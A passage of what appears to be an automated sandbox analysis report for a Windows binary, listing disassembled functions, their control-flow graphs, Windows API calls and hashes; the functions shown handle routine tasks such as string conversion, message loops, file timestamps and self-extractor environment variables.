                                                                                                                                                                                                    • Instruction ID: 3fd07cbe0a12a9940add08b44f208e7a459daee1fc59f6cc87c10c5718cfd8ad
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f0f3df0915f826a5b66e2596612a0613b336783a8837014f4e0e875d0244671f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D51BF715043849AEB31BB649844BABBBE5FF86744F04482EF9C4D71D1E7B08D85CB52
                                                                                                                                                                                                    Function 0089A95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 907 89a95b-89a974 908 89a98a-89a98f 907->908 909 89a976-89a986 call 89ef4c 907->909 910 89a99c-89a9c0 MultiByteToWideChar 908->910 911 89a991-89a999 908->911 909->908 916 89a988 909->916 913 89ab53-89ab66 call 88fbbc 910->913 914 89a9c6-89a9d2 910->914 911->910 917 89a9d4-89a9e5 914->917 918 89aa26 914->918 916->908 921 89aa04-89aa15 call 898e06 917->921 922 89a9e7-89a9f6 call 8a2010 917->922 920 89aa28-89aa2a 918->920 924 89ab48 920->924 925 89aa30-89aa43 MultiByteToWideChar 920->925 921->924 935 89aa1b 921->935 922->924 934 89a9fc-89aa02 922->934 929 89ab4a-89ab51 call 89abc3 924->929 925->924 928 89aa49-89aa5b call 89af6c 925->928 936 89aa60-89aa64 928->936 929->913 938 89aa21-89aa24 934->938 935->938 936->924 939 89aa6a-89aa71 936->939 938->920 940 89aaab-89aab7 939->940 941 89aa73-89aa78 939->941 943 89aab9-89aaca 940->943 944 89ab03 940->944 941->929 942 89aa7e-89aa80 941->942 942->924 945 89aa86-89aaa0 call 89af6c 942->945 947 89aacc-89aadb call 8a2010 943->947 948 89aae5-89aaf6 call 898e06 943->948 946 89ab05-89ab07 944->946 945->929 962 89aaa6 945->962 951 89ab09-89ab22 call 89af6c 946->951 952 89ab41-89ab47 call 89abc3 946->952 947->952 960 89aadd-89aae3 947->960 948->952 961 89aaf8 948->961 951->952 965 89ab24-89ab2b 951->965 952->924 964 89aafe-89ab01 960->964 961->964 962->924 964->946 966 89ab2d-89ab2e 965->966 967 89ab67-89ab6d 965->967 968 89ab2f-89ab3f WideCharToMultiByte 966->968 967->968 968->952 969 89ab6f-89ab76 call 89abc3 968->969 969->929
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,008957FB,008957FB,?,?,?,0089ABAC,00000001,00000001,2DE85006), ref: 0089A9B5
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0089ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0089AA3B
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0089AB35
                                                                                                                                                                                                    • __freea.LIBCMT ref: 0089AB42
                                                                                                                                                                                                      • Part of subcall function 00898E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00894286,?,0000015D,?,?,?,?,00895762,000000FF,00000000,?,?), ref: 00898E38
                                                                                                                                                                                                    • __freea.LIBCMT ref: 0089AB4B
                                                                                                                                                                                                    • __freea.LIBCMT ref: 0089AB70
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1414292761-0
                                                                                                                                                                                                    • Opcode ID: c9500f131da991f2771fbd1579f4285f183e01f08e89c7bfdd41b685248866b3
                                                                                                                                                                                                    • Instruction ID: 064a796a7b81375cb02f87ece65b209c8845e04f29edc6c7eb76ad0e08ff3a6e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9500f131da991f2771fbd1579f4285f183e01f08e89c7bfdd41b685248866b3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68519372610216AFEF29AE68CC81EBFB7AAFB44760F194629FC05D6140DB34DC50C6D2
                                                                                                                                                                                                    Function 0088DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 972 88dc3b-88dc54 WaitForSingleObject 973 88dc9c-88dc9e 972->973 974 88dc56-88dc57 972->974 975 88dc59-88dc69 PeekMessageW 974->975 976 88dc6b-88dc86 GetMessageW TranslateMessage DispatchMessageW 975->976 977 88dc8c-88dc99 WaitForSingleObject 975->977 976->977 977->975 978 88dc9b 977->978 978->973
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0088DC47
                                                                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0088DC61
                                                                                                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0088DC72
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 0088DC7C
                                                                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 0088DC86
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0088DC91
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2148572870-0
                                                                                                                                                                                                    • Opcode ID: 2f07cd61a232db5fdc507b8099e5e36956f4499faee56c3448523e50db5600c0
                                                                                                                                                                                                    • Instruction ID: 9f65daec99f68970dcaea75d88fae4d765bc23e03863b3400ebbe1cbab19cee6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f07cd61a232db5fdc507b8099e5e36956f4499faee56c3448523e50db5600c0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88F04F72A01219BBCB206BA5EC4CECF7F7DFF42791B004122F50AD2050D674CA46CBA1
                                                                                                                                                                                                    Function 00893B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 979 893b72-893b7c 980 893bee-893bf1 979->980 981 893b7e-893b8c 980->981 982 893bf3 980->982 984 893b8e-893b91 981->984 985 893b95-893bb1 LoadLibraryExW 981->985 983 893bf5-893bf9 982->983 986 893c09-893c0b 984->986 987 893b93 984->987 988 893bfa-893c00 985->988 989 893bb3-893bbc GetLastError 985->989 986->983 991 893beb 987->991 988->986 990 893c02-893c03 FreeLibrary 988->990 992 893bbe-893bd3 call 896088 989->992 993 893be6-893be9 989->993 990->986 991->980 992->993 996 893bd5-893be4 LoadLibraryExW 992->996 993->991 996->988 996->993
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00893C35,00000000,00000FA0,008D2088,00000000,?,00893D60,00000004,InitializeCriticalSectionEx,008A6394,InitializeCriticalSectionEx,00000000), ref: 00893C03
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                                                                    • API String ID: 3664257935-2084034818
                                                                                                                                                                                                    • Opcode ID: adc6c43fa27b6700b228dab648de9033b5181a9bc99dad4240c67fb037fcfc2c
                                                                                                                                                                                                    • Instruction ID: 8c7966c6625ad86fc0c39224fdd68e6ea41a1937118dd8bda9e08dd109e881b7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: adc6c43fa27b6700b228dab648de9033b5181a9bc99dad4240c67fb037fcfc2c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3110632A05625ABDF32AB689C41B5937A4FF02774F2D0210F811FB290E770EF0086D1
                                                                                                                                                                                                    Function 0088AC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34comCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0088081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00880836
                                                                                                                                                                                                      • Part of subcall function 0088081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0087F2D8,Crypt32.dll,00000000,0087F35C,?,?,0087F33E,?,?,?), ref: 00880858
                                                                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 0088AC2F
                                                                                                                                                                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0088AC66
                                                                                                                                                                                                    • SHGetMalloc.SHELL32(008B8438), ref: 0088AC70
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                                                                                                                    • String ID: riched20.dll$3Ro
                                                                                                                                                                                                    • API String ID: 3498096277-3613677438
                                                                                                                                                                                                    • Opcode ID: 3af3703ed150e575c6d271418e139feb705290935c898121adaaddb77c0a7165
                                                                                                                                                                                                    • Instruction ID: 7c929c62c1960805c813f35f0d4862c5c7c615622cbc2e4f8bf1c529918b857f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3af3703ed150e575c6d271418e139feb705290935c898121adaaddb77c0a7165
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17F0F9B5900209ABCB10AFA9D8499EFFBFCFF84700F00416AA415E2241DBB856458FA2
                                                                                                                                                                                                    Function 008798E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1001 8798e0-879901 call 88ec50 1004 879903-879906 1001->1004 1005 87990c 1001->1005 1004->1005 1006 879908-87990a 1004->1006 1007 87990e-87991f 1005->1007 1006->1007 1008 879927-879931 1007->1008 1009 879921 1007->1009 1010 879936-879943 call 876edb 1008->1010 1011 879933 1008->1011 1009->1008 1014 879945 1010->1014 1015 87994b-87996a CreateFileW 1010->1015 1011->1010 1014->1015 1016 87996c-87998e GetLastError call 87bb03 1015->1016 1017 8799bb-8799bf 1015->1017 1021 8799c8-8799cd 1016->1021 1026 879990-8799b3 CreateFileW GetLastError 1016->1026 1018 8799c3-8799c6 1017->1018 1020 8799d9-8799de 1018->1020 1018->1021 1024 8799e0-8799e3 1020->1024 1025 8799ff-879a10 1020->1025 1021->1020 1023 8799cf 1021->1023 1023->1020 1024->1025 1027 8799e5-8799f9 SetFileTime 1024->1027 1028 879a12-879a2a call 880602 1025->1028 1029 879a2e-879a39 1025->1029 1026->1018 1030 8799b5-8799b9 1026->1030 1027->1025 1028->1029 1030->1018
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00877760,?,00000005,?,00000011), ref: 0087995F
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00877760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0087996C
                                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00877760,?,00000005,?), ref: 008799A2
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00877760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008799AA
                                                                                                                                                                                                    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00877760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008799F9
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$CreateErrorLast$Time
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1999340476-0
                                                                                                                                                                                                    • Opcode ID: 2b82c827910e98cf2bee58529059f6a56aa1e0e749882853ff81e69e73c79ad6
                                                                                                                                                                                                    • Instruction ID: d5eb46e5b664b0cb18403aac630b62ea665878b6d3bb8e946e6d94b52e1ab0a4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b82c827910e98cf2bee58529059f6a56aa1e0e749882853ff81e69e73c79ad6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 93311130544745AFF7209B24CC46B9ABF98FB05320F204B19FAE9D61D5D3A4E984CB91
                                                                                                                                                                                                    Function 0088B568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1060 88b568-88b581 PeekMessageW 1061 88b5bc-88b5be 1060->1061 1062 88b583-88b597 GetMessageW 1060->1062 1063 88b5a8-88b5b6 TranslateMessage DispatchMessageW 1062->1063 1064 88b599-88b5a6 IsDialogMessageW 1062->1064 1063->1061 1064->1061 1064->1063
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0088B579
                                                                                                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0088B58A
                                                                                                                                                                                                    • IsDialogMessageW.USER32(00010464,?), ref: 0088B59E
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 0088B5AC
                                                                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 0088B5B6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1266772231-0
                                                                                                                                                                                                    • Opcode ID: 0edcac1e06e337240411adbb336701060838a32ab5a182fdee41635432e18806
                                                                                                                                                                                                    • Instruction ID: ca2d2e035b3db4af86a2d2462d6d9028b7a6c418756a4ebf7033287d37adfbc5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0edcac1e06e337240411adbb336701060838a32ab5a182fdee41635432e18806
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6F07071A0212ABB8B20AFE5EC4CDDB7FBCFE457917404515B515D2050EB74DA09CBB1
                                                                                                                                                                                                    Function 0088ABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1065 88abab-88abca GetClassNameW 1066 88abcc-88abe1 call 881fbb 1065->1066 1067 88abf2-88abf4 1065->1067 1072 88abf1 1066->1072 1073 88abe3-88abef FindWindowExW 1066->1073 1069 88abff-88ac01 1067->1069 1070 88abf6-88abf9 SHAutoComplete 1067->1070 1070->1069 1072->1067 1073->1072
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetClassNameW.USER32(?,?,00000050), ref: 0088ABC2
                                                                                                                                                                                                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 0088ABF9
                                                                                                                                                                                                      • Part of subcall function 00881FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0087C116,00000000,.exe,?,?,00000800,?,?,?,00888E3C), ref: 00881FD1
                                                                                                                                                                                                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0088ABE9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                                                                                                    • String ID: EDIT
                                                                                                                                                                                                    • API String ID: 4243998846-3080729518
                                                                                                                                                                                                    • Opcode ID: c7004b4e9b333c0b7f9d19f75c046a3f88415dcf3191422efcf4022587f056a2
                                                                                                                                                                                                    • Instruction ID: c6f3def3e9edc31ddd925e7c49317ffcb18ef72e34d13f5f02bfcc5cd39274d4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c7004b4e9b333c0b7f9d19f75c046a3f88415dcf3191422efcf4022587f056a2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25F0823270162876EB2066649C09F9B776CFF46B50F484112BA45F21C0DBA0DE4586B7
                                                                                                                                                                                                    Function 0088DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1074 88dbde-88dc09 call 88ec50 SetEnvironmentVariableW call 880371 1078 88dc0e-88dc12 1074->1078 1079 88dc14-88dc18 1078->1079 1080 88dc36-88dc38 1078->1080 1081 88dc21-88dc28 call 88048d 1079->1081 1084 88dc1a-88dc20 1081->1084 1085 88dc2a-88dc30 SetEnvironmentVariableW 1081->1085 1084->1081 1085->1080
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0088DBF4
                                                                                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0088DC30
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EnvironmentVariable
                                                                                                                                                                                                    • String ID: sfxcmd$sfxpar
                                                                                                                                                                                                    • API String ID: 1431749950-3493335439
                                                                                                                                                                                                    • Opcode ID: ae7f27fbdb05347ee52e2446fc8d74d622bc7916e139be759735a385028a2e4b
                                                                                                                                                                                                    • Instruction ID: 87c939d9b49c444f7979df68ea823dc027bab8ea5ce65c1e3cb5bb4ac8529732
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae7f27fbdb05347ee52e2446fc8d74d622bc7916e139be759735a385028a2e4b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4FF0E5B2504328ABEB213F99CC06BFA7B59FF16B85B040411FD85D6291E7B48980DBB1
                                                                                                                                                                                                    Function 00879785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00879795
                                                                                                                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 008797AD
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 008797DF
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 008797FE
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2244327787-0
                                                                                                                                                                                                    • Opcode ID: 81313d4186f97e7249482aa45c2af4986b47ade693fb6f23429ee3a85fe4800c
                                                                                                                                                                                                    • Instruction ID: 8a8f01f8c2fe7a62bc1a37988461e881485116366eea0000805717eb33a5f26f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81313d4186f97e7249482aa45c2af4986b47ade693fb6f23429ee3a85fe4800c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4411A130914608EBDF249F68C804A6A77A9FB433A4F10C939F4AEC5598E774DE44DB62
